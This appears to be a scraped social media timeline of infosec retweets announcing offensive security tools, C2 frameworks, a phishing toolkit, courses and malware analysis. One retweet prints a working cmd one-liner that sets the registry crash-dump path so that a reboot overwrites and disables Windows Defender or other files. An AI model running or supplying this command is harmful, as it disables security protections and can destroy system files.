5 Photos and videos
Uvemode retweeted
10 Jul 2025
While I have your attention, the Feet Feud survey still needs more answers...
forms.gle/SGLqk7ADWKnJNsR97
Read the intro (PLEASE) and only answer if you don't want a chance to play.
Only got a few more weeks left. I'll probably end up spamming the link a lot more times. 🤣
2
3
4
12,276
Introducing Havoc Professional: A Lethal Presence
We’re excited to share a first look at Havoc Professional, a next-generation, highly modular Command and Control framework, and Kaine-kit our fully Position Independent Code agent engineered for stealth!
infinitycurve.org/blog/intro…
56
183
735
73,256
Uvemode retweeted
3 Jul 2025
I know this is tough for some people, but it’s entirely possible to be all in on AI but still question marketing and hype.
14
12
136
10,521
Well, it happened. The company I worked at for 6 years will be closing and thus I got laid off. This doesn't affect @octopwn operations in any negative ways, but I'm actively looking for a new day job. If someone has something please DM me.
Retweets are appreciated.
7
120
184
34,821
Uvemode retweeted
19 Mar 2025
I am excited to announce the first conference dedicated to the offensive use of AI in security! Request an invite at offensiveaicon.com.
Co-organized by RemoteThreat, Dreadnode, & DEVSEC.
The Call for Papers opens Tuesday, March 25, 2025, and will remain open until Friday, July 18, 2025. Talks will include:
- Autonomous AI-based security testing
- Semi-autonomous offensive cyber operations
- AI-based vulnerability research and discovery
- Exploit development acceleration using AI
- Offensive security tool and capability development with AI
- AI-based target identification and analysis
- OODA workflows and multi-stage orchestration
- Offensive agentic AI frameworks and specialized models
Thank you to @Dreadnode for providing the initial seed funding boost to help make this dream a reality!
ALT www.offensiveaicon.com
4
75
181
21,649
Uvemode retweeted
18 Mar 2025
Loki C2 blog drop! Thank you for all those who helped and all the support from the community. Big shoutout to @d_tranman and @chompie1337 for all their contributions to Loki C2! @IBM @IBMSecurity @XForce
securityintelligence.com/x-f…
21
129
312
36,813
Uvemode retweeted
18 Mar 2025
The Offensive Phishing Operations Course has been released.
81 modules are included in the initial launch, with the first update already being worked on.
More information: maldevacademy.com/phishing-c…
Syllabus: maldevacademy.com/phishing-c…
112
176
469
50,347
Uvemode retweeted
11 Mar 2025
Hi friends!! 🩷
I’m looking for a new RE role to support me while I’m in grad school! I’ll be kind of in the woods, so remote roles are preferred! Recently I’ve been doing firmware RE/VR, but I got started doing malware RE and I love it lots (1/3)
3
40
88
38,785
Uvemode retweeted
12 Mar 2025
🚨 Evilginx Pro is finally here! 🚨🪝🐟
This is it! After over two years of development, countless delays, and hundreds of manual company verifications, Evilginx Pro is finally live!
Thank you all for your invaluable support 💗
breakdev.org/evilginx-pro-re…
27
82
417
39,044
GOAD Writeup - Part 14: ADCS – The Rest
Exploiting ESC 5, 7, 9, 10, 11, 13, 14, and 15 in Game of Active Directory.
mayfly277.github.io/posts/AD…
4
113
315
16,105
Uvemode retweeted
3 Mar 2025
We're excited to announce the upcoming launch of our new course: Offensive Phishing Operations.
More Info: maldevacademy.com/phishing-c…
Syllabus: maldevacademy.com/phishing-c…
Launch date: March 2025
14
72
414
26,726
Uvemode retweeted
28 Feb 2025
Short term memory in Infosec is terrible. There was a time when walking around Blackhat, every piece of marketing talked about ML solving malware. Ten years later, ML has improved a lot, but malware is still alive and kicking. People are still worried about MyFirstRat on GitHub. I’m also not saying ML didn’t make products better at detection, but people overestimate the solving of issues we face.
17
29
250
32,737
Uvemode retweeted
24 Feb 2025
🚨 Evilginx Pro is launching TOMORROW, February 25th!
Evilginx Pro will provide access to the official phishlets database from day one. 🪝🐟
Currently supported:
- Google
- MS365 Business
- Outlook Mail
- Okta
Demo below on how to access phishlets.
evilginx.com
3
76
381
23,547
Uvemode retweeted
25 Feb 2025
Over the past few months, I've been working on shadow-rs, a Windows Kernel Rootkit in Rust with various features.
Huge thanks to @zodiacon for his Windows Kernel Programming book, @Idov31 & @eversinc33 for inspiration & discussions!
github.com/joaoviictorti/sha…
4
37
123
9,511
Uvemode retweeted
10 Feb 2025
Is your EDR a dump?
Yes it is!
cmd /v/c "set R=reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /f /v&!R! CrashDumpEnabled /d 7 /t 4&!R! DumpFileSize /d 666 /t 4&for /f "delims=*" %i in ('sc qc WinDefend^|find "PATH_"')do (set t=%i&!R! DedicatedDumpFile /d !t:~29,-1!)"
ALT Upon boot crashdmp.sys has clobbered MsMpEng.exe, destroying & resizing it to 666 MB. It also still holds the file handle, with NONE share access. ▸ No system crash needed, only reboot. ▸ Defender is just an example; works versus anything (try ntoskrnl.exe). ▸ Dedicated dump is not the only bootside kill; at least 4 more distinct yet similar ways. ⚠️ Administrative access required. LPE exploit not included, and sold separately where legally available. Consult your local security specialist before use. Side effects may include boot failures and audit logs. Void where prohibited. 📋 crashdmp.sys IoCreateFile call: ▸ access: 0x150003, read|write|delete|wdac|sync ▸ share: 0, none ▸ disposition: 0, file_supersede (create/replace) ▸ io options: 0x0102, io_open_paging_file|io_no_parameter_checking ▸ options: 0x900A, write_through|no_intermediate_buffering|delete_on_close|no_compression Bonus: 🕵️ Spot at least one of reg.exe tricks I've used; call it out in the reply to get a cat emoji!
8
181
746
58,418
🚀 Today I'm launching ArgFuscator: an open-source platform documenting command-line obfuscation tricks AND letting you generate your own
🔥 68 executables supported out of the box - use right away, make tweaks, or create your own
👉 Now available at argfuscator.net
19
185
675
61,060
Uvemode retweeted
4 Feb 2025
My colleague just publicly released a tool he was working on for the last 3 years aimed at providing deep insights in your user landscape in hybrid MS environments with a special focus on security related info and tasks.
You can find msuserstats here:
github.com/Phil0x4a/msuserst…
3
35
124
7,453
Uvemode retweeted
28 Jan 2025
My RDP IO Lab presentation on "Decrypting and Inspecting RDP traffic in Wireshark" was just *cancelled* - apparently Microsoft decided they would only do internal presentations, with no guest speakers 😠
What's the point of even trying when you get treated like this?
15 Jan 2025
Who would like to review my slides for my upcoming RDP IO Lab presentation on "Decrypting and Inspecting RDP traffic in Wireshark"? I have finished my first draft, but could use some feedback. It's supposed to be 45 minutes in total, including Q&A. Just DM me with your email and I'll send you a copy
31
60
488
67,903
Uvemode retweeted
28 Jan 2025
I am happy to announce JonMon2.0 has been published.
2.0 offers a lot of feature updates, as well as stability. More features still to come as time goes on. Enjoy and let me know if you have any issues or questions.
Link: github.com/jsecurity101/JonM…
5
47
122
19,795
I have uploaded the recording to YouTube of the Conti Source Code analysis, exploring the encryptor code base.
We cover various functionality implementation and oppurtunities for improvement/detection.
youtu.be/SGbhqwXB-GU
Join me tomorrow at 2PM UTC in OnlyMalware as part of a new series where I look to explore leaked malware code bases.
This week we will start with the infamous Conti source code leak. I'm looking forward to seeing y'all there!
discord.gg/onlymalware?event…
1
29
95
13,280